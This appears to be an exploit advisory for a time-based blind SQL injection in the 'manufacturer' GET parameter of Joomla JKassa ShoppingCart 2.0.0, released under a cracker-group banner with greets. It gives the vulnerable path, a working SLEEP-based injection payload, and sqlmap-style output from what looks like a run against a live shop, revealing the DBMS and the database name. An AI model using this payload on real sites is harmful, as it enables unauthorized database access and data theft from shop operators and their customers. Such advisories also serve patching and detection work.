Exploit for Joomla JKassa ShoppingCart 2.0.0 SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:168593
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Exploits ] ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr :  
│ Website : extensions.joomla.org │  
│ Vendor : GeneticsPro - jkassa.com │  
│ Software : Joomla JKassa ShoppingCart 2.0.0 │  
│ Vuln Type: SQL Injection │  
│ Method : GET │  
│ Impact : Database Access │  
│ │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│ B4nks-NET irc.b4nks.tk #unix ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ Typically used for remotely exploitable vulnerabilities that can lead to │  
│ system compromise │  
│ │  
│ │  
│ │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
  
CryptoJob (Twitter) twitter.com/CryptozJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2022 ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
  
Path: /shop/men/sweatshirts.feed  
  
GET parameter 'manufacturer' is vulnerable  
  
---  
Parameter: manufacturer (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: min_cost=25.6&max_cost=67.74&manufacturer=null) AND (SELECT 8420 FROM (SELECT(SLEEP(5)))bIVQ) AND (1590=1590&attribute=null&_=1664646035244&type=atom  
---  
  
[+] Starting the Attack  
  
[INFO] the back-end DBMS is MySQL  
  
web application technology: Nginx, PHP 7.4.16  
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)  
  
current database: 'jkassa_umarket'  
  
  
  
[-] Done